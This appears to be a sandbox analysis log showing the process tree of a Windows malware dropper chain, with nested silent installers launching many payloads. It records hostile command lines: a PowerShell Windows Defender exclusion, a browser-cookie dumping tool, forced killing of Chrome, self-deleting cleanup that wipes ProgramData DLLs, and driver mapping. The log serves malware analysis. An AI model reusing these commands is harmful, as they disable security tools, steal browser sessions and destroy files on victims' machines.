PID:6056 -
C:\Users\Admin\AppData\Local\Temp\is-K0DJO.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-K0DJO.tmp\Setup.tmp" /SL5="$B0038,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-L7PA0.tmp\Setup.exe" /Verysilent19⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6216 -
C:\Users\Admin\AppData\Local\Temp\is-Q0QDB.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-Q0QDB.tmp\Delta.exe" /Verysilent20⤵PID:8520
-
C:\Users\Admin\AppData\Local\Temp\is-PR8P9.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-PR8P9.tmp\Delta.tmp" /SL5="$50508,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-Q0QDB.tmp\Delta.exe" /Verysilent21⤵
- Loads dropped DLL
PID:8548 -
C:\Users\Admin\AppData\Local\Temp\is-MK98H.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MK98H.tmp\Setup.exe" /VERYSILENT22⤵
- Loads dropped DLL
- Checks processor information in registry
PID:8796 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-MK98H.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit23⤵PID:9624
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f24⤵
- Kills process with taskkill
PID:9776 -
C:\Windows\SysWOW64\timeout.exetimeout /t 624⤵
- Delays execution with timeout.exe
PID:10112 -
C:\Users\Admin\AppData\Local\Temp\is-Q0QDB.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-Q0QDB.tmp\PictureLAb.exe" /Verysilent20⤵PID:8816
-
C:\Users\Admin\AppData\Local\Temp\is-IFDVV.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-IFDVV.tmp\PictureLAb.tmp" /SL5="$70508,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-Q0QDB.tmp\PictureLAb.exe" /Verysilent21⤵
- Loads dropped DLL
PID:8852 -
C:\Users\Admin\AppData\Local\Temp\is-56N4O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-56N4O.tmp\Setup.exe" /VERYSILENT22⤵PID:9120
-
C:\Users\Admin\AppData\Local\Temp\is-6J5DM.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-6J5DM.tmp\Setup.tmp" /SL5="$6053E,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-56N4O.tmp\Setup.exe" /VERYSILENT23⤵
- Loads dropped DLL
PID:9140 -
C:\Users\Admin\AppData\Local\Temp\is-TDA3F.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-TDA3F.tmp\HGT.exe" /S /UID=lab21424⤵PID:9336
-
C:\Users\Admin\AppData\Local\Temp\48-eb50f-f9a-4099f-1a2f5184b1259\Laejutyhene.exe"C:\Users\Admin\AppData\Local\Temp\48-eb50f-f9a-4099f-1a2f5184b1259\Laejutyhene.exe"25⤵PID:9544
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\znyditn1.wue\gaooo.exe & exit26⤵PID:4260
-
C:\Users\Admin\AppData\Local\Temp\znyditn1.wue\gaooo.exeC:\Users\Admin\AppData\Local\Temp\znyditn1.wue\gaooo.exe27⤵PID:7340
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:5244
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:9496
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:6992
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x5eyemqs.ixn\md7_7dfj.exe & exit26⤵PID:9788
-
C:\Users\Admin\AppData\Local\Temp\x5eyemqs.ixn\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\x5eyemqs.ixn\md7_7dfj.exe27⤵PID:8372
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n5zrs3dh.trc\askinstall29.exe & exit26⤵PID:10024
-
C:\Users\Admin\AppData\Local\Temp\n5zrs3dh.trc\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\n5zrs3dh.trc\askinstall29.exe27⤵PID:9868
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe28⤵PID:10452
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe29⤵
- Kills process with taskkill
PID:9232 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsnoeh1r.0yu\customer4.exe & exit26⤵PID:10304
-
C:\Users\Admin\AppData\Local\Temp\xsnoeh1r.0yu\customer4.exeC:\Users\Admin\AppData\Local\Temp\xsnoeh1r.0yu\customer4.exe27⤵PID:8128
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"28⤵
- Loads dropped DLL
PID:9308 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sqyfjxx4.4qe\HookSetp.exe & exit26⤵PID:10436
-
C:\Users\Admin\AppData\Local\Temp\sqyfjxx4.4qe\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\sqyfjxx4.4qe\HookSetp.exe27⤵PID:10632
-
C:\ProgramData\4000527.43"C:\ProgramData\4000527.43"28⤵PID:11816
-
C:\ProgramData\2715627.29"C:\ProgramData\2715627.29"28⤵PID:11876
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0xrvtpvp.2bi\GcleanerWW.exe /mixone & exit26⤵PID:8084
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1yntfegd.oky\privacytools5.exe & exit26⤵PID:9136
-
C:\Users\Admin\AppData\Local\Temp\1yntfegd.oky\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\1yntfegd.oky\privacytools5.exe27⤵
- Suspicious use of SetThreadContext
PID:11100 -
C:\Users\Admin\AppData\Local\Temp\1yntfegd.oky\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\1yntfegd.oky\privacytools5.exe28⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:11576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nuh3v4jz.iok\setup.exe /8-2222 & exit26⤵PID:11144
-
C:\Users\Admin\AppData\Local\Temp\nuh3v4jz.iok\setup.exeC:\Users\Admin\AppData\Local\Temp\nuh3v4jz.iok\setup.exe /8-222227⤵PID:11640
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Shy-Snowflake"28⤵PID:11732
-
C:\Program Files (x86)\Shy-Snowflake\7za.exe"C:\Program Files (x86)\Shy-Snowflake\7za.exe" e -p154.61.71.51 winamp-plugins.7z28⤵PID:7856
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Shy-Snowflake\setup.exe" -map "C:\Program Files (x86)\Shy-Snowflake\WinmonProcessMonitor.sys""28⤵PID:16268
-
C:\Program Files (x86)\Shy-Snowflake\setup.exe"C:\Program Files (x86)\Shy-Snowflake\setup.exe" -map "C:\Program Files (x86)\Shy-Snowflake\WinmonProcessMonitor.sys"29⤵PID:17132
-
C:\Program Files (x86)\Shy-Snowflake\7za.exe"C:\Program Files (x86)\Shy-Snowflake\7za.exe" e -p154.61.71.51 winamp.7z28⤵PID:17792
-
C:\Program Files (x86)\Shy-Snowflake\setup.exe"C:\Program Files (x86)\Shy-Snowflake\setup.exe" /8-222228⤵PID:15224
-
C:\Program Files (x86)\Shy-Snowflake\setup.exe"C:\Program Files (x86)\Shy-Snowflake\setup.exe" /8-222229⤵PID:13228
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4bfsy30v.dsl\MultitimerFour.exe & exit26⤵PID:11260
-
C:\Users\Admin\AppData\Local\Temp\4bfsy30v.dsl\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\4bfsy30v.dsl\MultitimerFour.exe27⤵PID:11744
-
C:\Users\Admin\AppData\Local\Temp\458805IZJ0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\458805IZJ0\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10428⤵PID:12656
-
C:\Users\Admin\AppData\Local\Temp\458805IZJ0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\458805IZJ0\multitimer.exe" 1 3.1616083684.60537ae477e16 10429⤵PID:12156
-
C:\Users\Admin\AppData\Local\Temp\458805IZJ0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\458805IZJ0\multitimer.exe" 2 3.1616083684.60537ae477e1630⤵PID:13564
-
C:\Users\Admin\AppData\Local\Temp\fp0htblc20g\vict.exe"C:\Users\Admin\AppData\Local\Temp\fp0htblc20g\vict.exe" /VERYSILENT /id=53531⤵PID:15440
-
C:\Users\Admin\AppData\Local\Temp\is-08LQ1.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-08LQ1.tmp\vict.tmp" /SL5="$40484,870426,780800,C:\Users\Admin\AppData\Local\Temp\fp0htblc20g\vict.exe" /VERYSILENT /id=53532⤵PID:15640
-
C:\Users\Admin\AppData\Local\Temp\is-4K9TB.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-4K9TB.tmp\wimapi.exe" 53533⤵PID:15932
-
C:\Users\Admin\AppData\Local\Temp\4edpzs0hg0e\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\4edpzs0hg0e\AwesomePoolU1.exe"31⤵PID:15424
-
C:\Users\Admin\AppData\Local\Temp\sytta54fpee\12pnnoeqvs1.exe"C:\Users\Admin\AppData\Local\Temp\sytta54fpee\12pnnoeqvs1.exe" /ustwo INSTALL31⤵PID:15420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15420 -s 64832⤵
- Program crash
PID:4316 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15420 -s 66032⤵
- Program crash
PID:4732 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15420 -s 76432⤵
- Program crash
PID:5452 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15420 -s 80032⤵
- Program crash
PID:5612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15420 -s 89632⤵
- Program crash
PID:4980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15420 -s 92832⤵
- Program crash
PID:7652 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15420 -s 108432⤵
- Program crash
PID:7320 -
C:\Users\Admin\AppData\Local\Temp\pxh54zvwkmc\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\pxh54zvwkmc\askinstall24.exe"31⤵PID:496
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe32⤵PID:16300
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe33⤵
- Kills process with taskkill
PID:16888 -
C:\Users\Admin\AppData\Local\Temp\eolrku5iwgg\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\eolrku5iwgg\Setup3310.exe" /Verysilent /subid=57731⤵PID:15820
-
C:\Users\Admin\AppData\Local\Temp\is-R0OTU.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-R0OTU.tmp\Setup3310.tmp" /SL5="$40566,138429,56832,C:\Users\Admin\AppData\Local\Temp\eolrku5iwgg\Setup3310.exe" /Verysilent /subid=57732⤵PID:15500
-
C:\Users\Admin\AppData\Local\Temp\is-059NA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-059NA.tmp\Setup.exe" /Verysilent33⤵PID:15868
-
C:\Users\Admin\AppData\Local\Temp\is-P33M9.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-P33M9.tmp\Setup.tmp" /SL5="$7057E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-059NA.tmp\Setup.exe" /Verysilent34⤵PID:17728
-
C:\Users\Admin\AppData\Local\Temp\is-DSVRI.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-DSVRI.tmp\Delta.exe" /Verysilent35⤵PID:9664
-
C:\Users\Admin\AppData\Local\Temp\is-L2U8E.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-L2U8E.tmp\Delta.tmp" /SL5="$4058A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-DSVRI.tmp\Delta.exe" /Verysilent36⤵PID:9024
-
C:\Users\Admin\AppData\Local\Temp\is-AQK60.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AQK60.tmp\Setup.exe" /VERYSILENT37⤵PID:7976
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-AQK60.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit38⤵PID:13072
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f39⤵
- Kills process with taskkill
PID:10952 -
C:\Windows\SysWOW64\timeout.exetimeout /t 639⤵
- Delays execution with timeout.exe
PID:11340 -
C:\Users\Admin\AppData\Local\Temp\is-DSVRI.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-DSVRI.tmp\PictureLAb.exe" /Verysilent35⤵PID:8384
-
C:\Users\Admin\AppData\Local\Temp\is-FEPG1.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-FEPG1.tmp\PictureLAb.tmp" /SL5="$C007E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-DSVRI.tmp\PictureLAb.exe" /Verysilent36⤵PID:9412
-
C:\Users\Admin\AppData\Local\Temp\is-JCJ94.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JCJ94.tmp\Setup.exe" /VERYSILENT37⤵PID:11088
-
C:\Users\Admin\AppData\Local\Temp\is-BN1NV.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BN1NV.tmp\Setup.tmp" /SL5="$2062E,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-JCJ94.tmp\Setup.exe" /VERYSILENT38⤵PID:6444
-
C:\Users\Admin\AppData\Local\Temp\is-3ANTV.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-3ANTV.tmp\HGT.exe" /S /UID=lab21439⤵PID:11512
-
C:\Users\Admin\AppData\Local\Temp\2d-6d1b7-49f-df389-4d52b761300f1\Lozhilaqoqu.exe"C:\Users\Admin\AppData\Local\Temp\2d-6d1b7-49f-df389-4d52b761300f1\Lozhilaqoqu.exe"40⤵PID:12780
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhcqzrkn.hdq\gaooo.exe & exit41⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\vhcqzrkn.hdq\gaooo.exeC:\Users\Admin\AppData\Local\Temp\vhcqzrkn.hdq\gaooo.exe42⤵PID:15180
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵PID:8288
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt43⤵PID:12728
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tzphvwij.xmk\md7_7dfj.exe & exit41⤵PID:16700
-
C:\Users\Admin\AppData\Local\Temp\tzphvwij.xmk\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\tzphvwij.xmk\md7_7dfj.exe42⤵PID:5184
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4jhljtrz.cig\askinstall29.exe & exit41⤵PID:18420
-
C:\Users\Admin\AppData\Local\Temp\4jhljtrz.cig\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\4jhljtrz.cig\askinstall29.exe42⤵PID:4740
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe43⤵PID:16804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe44⤵
- Kills process with taskkill
PID:6112 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zkn135qa.mh1\customer4.exe & exit41⤵PID:17840
-
C:\Users\Admin\AppData\Local\Temp\zkn135qa.mh1\customer4.exeC:\Users\Admin\AppData\Local\Temp\zkn135qa.mh1\customer4.exe42⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"43⤵PID:17376
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z5wddps0.b1x\HookSetp.exe & exit41⤵PID:6632
-
C:\Users\Admin\AppData\Local\Temp\z5wddps0.b1x\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\z5wddps0.b1x\HookSetp.exe42⤵PID:7152
-
C:\ProgramData\561890.6"C:\ProgramData\561890.6"43⤵PID:7264
-
C:\ProgramData\5044539.55"C:\ProgramData\5044539.55"43⤵PID:6840
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2yjpzt0c.rlo\GcleanerWW.exe /mixone & exit41⤵PID:6796
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mnyrjj3j.21h\privacytools5.exe & exit41⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\mnyrjj3j.21h\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\mnyrjj3j.21h\privacytools5.exe42⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\mnyrjj3j.21h\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\mnyrjj3j.21h\privacytools5.exe43⤵PID:5740
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\twao0yq3.rke\setup.exe /8-2222 & exit41⤵PID:10236
-
C:\Users\Admin\AppData\Local\Temp\twao0yq3.rke\setup.exeC:\Users\Admin\AppData\Local\Temp\twao0yq3.rke\setup.exe /8-222242⤵PID:7284
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Little-Frog"43⤵PID:15888
-
C:\Program Files (x86)\Little-Frog\7za.exe"C:\Program Files (x86)\Little-Frog\7za.exe" e -p154.61.71.51 winamp-plugins.7z43⤵PID:13340
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Little-Frog\setup.exe" -map "C:\Program Files (x86)\Little-Frog\WinmonProcessMonitor.sys""43⤵PID:8792
-
C:\Program Files (x86)\Little-Frog\setup.exe"C:\Program Files (x86)\Little-Frog\setup.exe" -map "C:\Program Files (x86)\Little-Frog\WinmonProcessMonitor.sys"44⤵PID:18100
-
C:\Program Files (x86)\Little-Frog\7za.exe"C:\Program Files (x86)\Little-Frog\7za.exe" e -p154.61.71.51 winamp.7z43⤵PID:10560
-
C:\Program Files (x86)\Little-Frog\setup.exe"C:\Program Files (x86)\Little-Frog\setup.exe" /8-222243⤵PID:14388
-
C:\Program Files (x86)\Little-Frog\setup.exe"C:\Program Files (x86)\Little-Frog\setup.exe" /8-222244⤵PID:4428
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\skmkn1rd.owx\MultitimerFour.exe & exit41⤵PID:7620
-
C:\Users\Admin\AppData\Local\Temp\skmkn1rd.owx\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\skmkn1rd.owx\MultitimerFour.exe42⤵PID:6328
-
C:\Users\Admin\AppData\Local\Temp\KV10LRTPPT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KV10LRTPPT\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10443⤵PID:7184
-
C:\Users\Admin\AppData\Local\Temp\KV10LRTPPT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KV10LRTPPT\multitimer.exe" 1 3.1616083796.60537b546597f 10444⤵PID:10496
-
C:\Users\Admin\AppData\Local\Temp\KV10LRTPPT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KV10LRTPPT\multitimer.exe" 2 3.1616083796.60537b546597f45⤵PID:11228
-
C:\Users\Admin\AppData\Local\Temp\mnycl2f5yfq\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\mnycl2f5yfq\AwesomePoolU1.exe"46⤵PID:7400
-
C:\Users\Admin\AppData\Local\Temp\l40cayeor1c\hk0iyzzzx3b.exe"C:\Users\Admin\AppData\Local\Temp\l40cayeor1c\hk0iyzzzx3b.exe" /ustwo INSTALL46⤵PID:7056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 64847⤵
- Program crash
PID:14992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 66047⤵
- Program crash
PID:16444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 76847⤵
- Program crash
PID:15272 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 80047⤵
- Program crash
PID:15316 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 90447⤵
- Program crash
PID:16040 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 92847⤵
- Program crash
PID:15288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 109247⤵
- Program crash
PID:5892 -
C:\Users\Admin\AppData\Local\Temp\rvf2cmq1llt\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\rvf2cmq1llt\Setup3310.exe" /Verysilent /subid=57746⤵PID:9460
-
C:\Users\Admin\AppData\Local\Temp\is-P6BI3.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-P6BI3.tmp\Setup3310.tmp" /SL5="$805EC,138429,56832,C:\Users\Admin\AppData\Local\Temp\rvf2cmq1llt\Setup3310.exe" /Verysilent /subid=57747⤵PID:8576
-
C:\Users\Admin\AppData\Local\Temp\is-6MCLK.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6MCLK.tmp\Setup.exe" /Verysilent48⤵PID:13076
-
C:\Users\Admin\AppData\Local\Temp\is-P5QR4.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-P5QR4.tmp\Setup.tmp" /SL5="$70482,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-6MCLK.tmp\Setup.exe" /Verysilent49⤵PID:13632
-
C:\Users\Admin\AppData\Local\Temp\is-EEQ8G.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-EEQ8G.tmp\Delta.exe" /Verysilent50⤵PID:7060
-
C:\Users\Admin\AppData\Local\Temp\is-AFEAG.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-AFEAG.tmp\Delta.tmp" /SL5="$C053E,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-EEQ8G.tmp\Delta.exe" /Verysilent51⤵PID:6732
-
C:\Users\Admin\AppData\Local\Temp\is-U4TVG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-U4TVG.tmp\Setup.exe" /VERYSILENT52⤵PID:10552
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-U4TVG.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit53⤵PID:11160
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f54⤵
- Kills process with taskkill
PID:15152 -
C:\Windows\SysWOW64\timeout.exetimeout /t 654⤵
- Delays execution with timeout.exe
PID:15236 -
C:\Users\Admin\AppData\Local\Temp\is-EEQ8G.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-EEQ8G.tmp\PictureLAb.exe" /Verysilent50⤵PID:9680
-
C:\Users\Admin\AppData\Local\Temp\is-11D8K.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-11D8K.tmp\PictureLAb.tmp" /SL5="$D053E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-EEQ8G.tmp\PictureLAb.exe" /Verysilent51⤵PID:9672
-
C:\Users\Admin\AppData\Local\Temp\is-71Q27.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-71Q27.tmp\Setup.exe" /VERYSILENT52⤵PID:10844
-
C:\Users\Admin\AppData\Local\Temp\is-UQ38L.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-UQ38L.tmp\Setup.tmp" /SL5="$703F0,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-71Q27.tmp\Setup.exe" /VERYSILENT53⤵PID:10384
-
C:\Users\Admin\AppData\Local\Temp\is-VROH2.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-VROH2.tmp\HGT.exe" /S /UID=lab21454⤵PID:10080
-
C:\Users\Admin\AppData\Local\Temp\39-24c9f-ea0-6aeb4-ae29d1d776b39\Mijisytaecu.exe"C:\Users\Admin\AppData\Local\Temp\39-24c9f-ea0-6aeb4-ae29d1d776b39\Mijisytaecu.exe"55⤵PID:8820
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\st1xbckq.m5y\gaooo.exe & exit56⤵PID:14856
-
C:\Users\Admin\AppData\Local\Temp\st1xbckq.m5y\gaooo.exeC:\Users\Admin\AppData\Local\Temp\st1xbckq.m5y\gaooo.exe57⤵PID:5420
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵PID:2208
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt58⤵PID:11268
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\poubygbx.45l\md7_7dfj.exe & exit56⤵PID:15672
-
C:\Users\Admin\AppData\Local\Temp\poubygbx.45l\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\poubygbx.45l\md7_7dfj.exe57⤵PID:6188
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\udns355a.qao\askinstall29.exe & exit56⤵PID:17428
-
C:\Users\Admin\AppData\Local\Temp\udns355a.qao\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\udns355a.qao\askinstall29.exe57⤵PID:16092
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe58⤵PID:18136
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe59⤵
- Kills process with taskkill
PID:6160 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tkh0a43o.vlv\customer4.exe & exit56⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\tkh0a43o.vlv\customer4.exeC:\Users\Admin\AppData\Local\Temp\tkh0a43o.vlv\customer4.exe57⤵PID:5900
-
